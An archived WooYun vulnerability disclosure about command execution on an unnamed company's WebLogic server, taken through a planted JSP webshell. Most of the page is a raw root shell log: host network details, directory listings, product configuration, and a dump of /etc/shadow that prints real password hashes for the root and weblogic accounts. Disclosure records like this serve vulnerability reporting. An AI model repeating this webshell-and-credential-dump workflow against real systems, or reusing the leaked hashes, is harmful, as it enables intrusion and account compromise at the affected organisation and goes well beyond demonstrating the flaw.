乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-22: 细节已通知厂商并且等待厂商处理中 2015-12-26: 厂商已经确认,细节仅向厂商公开 2016-01-05: 细节向核心白帽子及相关领域专家公开 2016-01-15: 细节向普通白帽子公开 2016-01-25: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
http://**.**.**.**/官网哦 weblogc 命令执行shellhttp://**.**.**.**/jspspy.jspx
点到为止,可控制这个公司网络
/bin/sh: line 4: ipconfig: command not foundifconfigeth0 Link encap:Ethernet HWaddr 6C:AE:8B:3B:5A:22 inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.** inet6 addr: fe80::6eae:8bff:fe3b:5a22/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:149526305 errors:0 dropped:0 overruns:0 frame:0 TX packets:120117439 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:15612327340 (14.5 GiB) TX bytes:111982525543 (104.2 GiB) Memory:91a60000-91a80000eth1 Link encap:Ethernet HWaddr 6C:AE:8B:3B:5A:23 inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.** inet6 addr: fe80::6eae:8bff:fe3b:5a23/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:46606428 errors:0 dropped:0 overruns:0 frame:0 TX packets:48995860 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4062393812 (3.7 GiB) TX bytes:7061418128 (6.5 GiB) Memory:91a40000-91a60000lo Link encap:Local Loopback inet addr:**.**.**.** Mask:**.**.**.** inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:42370 errors:0 dropped:0 overruns:0 frame:0 TX packets:42370 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:9803631 (9.3 MiB) TX bytes:9803631 (9.3 MiB)usb0 Link encap:Ethernet HWaddr 6E:AE:8B:3B:5A:21 inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.** inet6 addr: fe80::6cae:8bff:fe3b:5a21/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:44321912 errors:0 dropped:0 overruns:0 frame:0 TX packets:44189494 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3626173772 (3.3 GiB) TX bytes:4234648024 (3.9 GiB)iduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)lsautodeploybinconfigconsole-extedit.lokfileRealm.propertieshttp:init-infojavax.servlet.context.tempdirlibnohup.outpendingsecurityserversstartWebLogic.shtmppwd/opt/weblogic103/user_projects/domains/mydomainfind -name weblogic.xml./servers/AdminServer/upload/ech/WEB-INF/weblogic.xml./servers/AdminServer/upload/eco20151012/WEB-INF/weblogic.xml./servers/AdminServer/upload/eco/WEB-INF/weblogic.xml./servers/AdminServer/upload/ech20151217/WEB-INF/weblogic.xml./servers/AdminServer/upload/eco20151214/WEB-INF/weblogic.xml./servers/AdminServer/upload/ecf/WEB-INF/weblogic.xml./servers/AdminServer/upload/oldeco/WEB-INF/weblogic.xml./servers/AdminServer/upload/eco.bak/WEB-INF/weblogic.xml./servers/AdminServer/upload/ech20151214/WEB-INF/weblogic.xml./servers/AdminServer/tmp/.appmergegen_1416791375320/ecd.war/30u8hq/WEB-INF/weblogic.xml./servers/AdminServer/tmp/.appmergegen_1416791375320_ecd.war/WEB-INF/weblogic.xml./servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/WEB-INF/weblogic.xml./servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/WEB-INF/weblogic.xmldir ../mydomaindirautodeploy http: securitybin init-info serversconfig javax.servlet.context.tempdir startWebLogic.shconsole-ext lib tmpedit.lok nohup.outfileRealm.properties pendingls ../mydomainpwd/opt/weblogic103/user_projects/domains/mydomainls /opt/weblogic103/coherence_3.7domain-registry.xmllogsmodulesocm.rspregistry.datregistry.xmluser_projectsutilswlserver_10.3cat /opt/weblogic103/registry.xml<?xml version="1.0" encoding="UTF-8"?><bea-product-information xmlns:fo="http://**.**.**.**/1999/XSL/Format" xmlns:gpr="http://**.**.**.**/ns/cie/gpr"> <host home="/opt/weblogic103" name="localhost.localdomain"> <product format="1.0" name="WebLogic Platform"> <release level="10.3" ServicePackLevel="6" PatchLevel="0" Status="installed" InstallTime="Aug 22, 2014 1:36:08 PM" InstallDir="/opt/weblogic103"> <component name="Common Infrastructure Engineering" version="**.**.**.**" InstallDir=""> <component name="Uninstall"/> <component name="Patch Client"/> <component name="Patch Attachment Facility"/> <component name="Clone Facility"/> </component> <component name="WebLogic Server" version="**.**.**.**" InstallDir="/opt/weblogic103/wlserver_10.3"> <component name="Core Application Server"/> <component name="Administration Console"/> <component name="Configuration Wizard and Upgrade Framework"/> <component name="Web 2.0 HTTP Pub-Sub Server"/> <component name="WebLogic SCA"/> <component name="WebLogic JDBC Drivers"/> <component name="Third Party JDBC Drivers"/> <component name="WebLogic Server Clients"/> <component name="WebLogic Web Server Plugins"/> <component name="UDDI and Xquery Support"/> <component name="Evaluation Database"/> <component name="Workshop Code Completion Support"/> </component> <component name="Oracle Configuration Manager" version="**.**.**.**" InstallDir=""> <component name="Data Collector"/> </component> <component name="Oracle Coherence" version="**.**.**.**" InstallDir="/opt/weblogic103/coherence_3.7"> <component name="Coherence Product Files"/> </component> </release> </product> </host></bea-product-information>lsautodeploybinconfigconsole-extedit.lokfileRealm.propertieshttp:init-infojavax.servlet.context.tempdirlibnohup.outpendingsecurityserversstartWebLogic.shtmphistorylsautodeploybinconfigconsole-extedit.lokfileRealm.propertieshttp:init-infojavax.servlet.context.tempdirlibnohup.outpendingsecurityserversstartWebLogic.shtmpls /rootanaconda-ks.cfgDesktopinstall.loginstall.log.syslogcat /etc/hosts# Do not remove the following line, or various programs# that require network functionality will fail.**.**.**.** localhost.localdomain localhost::1 localhost6.localdomain6 localhost6cat /etc/shadowroot:$1$ROcyhN9o$PDkUIuRJvAUGUUeFrmUPc1:16302:0:99999:7:::bin:*:16302:0:99999:7:::daemon:*:16302:0:99999:7:::adm:*:16302:0:99999:7:::lp:*:16302:0:99999:7:::sync:*:16302:0:99999:7:::shutdown:*:16302:0:99999:7:::halt:*:16302:0:99999:7:::mail:*:16302:0:99999:7:::news:*:16302:0:99999:7:::uucp:*:16302:0:99999:7:::operator:*:16302:0:99999:7:::games:*:16302:0:99999:7:::gopher:*:16302:0:99999:7:::ftp:*:16302:0:99999:7:::nobody:*:16302:0:99999:7:::nscd:!!:16302:0:99999:7:::vcsa:!!:16302:0:99999:7:::ntp:!!:16302:0:99999:7:::pcap:!!:16302:0:99999:7:::dbus:!!:16302:0:99999:7:::avahi:!!:16302:0:99999:7:::rpc:!!:16302:0:99999:7:::mailnull:!!:16302:0:99999:7:::smmsp:!!:16302:0:99999:7:::sshd:!!:16302:0:99999:7:::oprofile:!!:16302:0:99999:7:::rpcuser:!!:16302:0:99999:7:::nfsnobody:!!:16302:0:99999:7:::xfs:!!:16302:0:99999:7:::haldaemon:!!:16302:0:99999:7:::avahi-autoipd:!!:16302:0:99999:7:::gdm:!!:16302:0:99999:7:::sabayon:!!:16302:0:99999:7:::weblogic:$1$UliL63Sn$UodIsckph5OG21qySugvD0:16304:0:99999:7:::
危害等级:中
漏洞Rank:9
确认时间:2015-12-26 23:38
CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无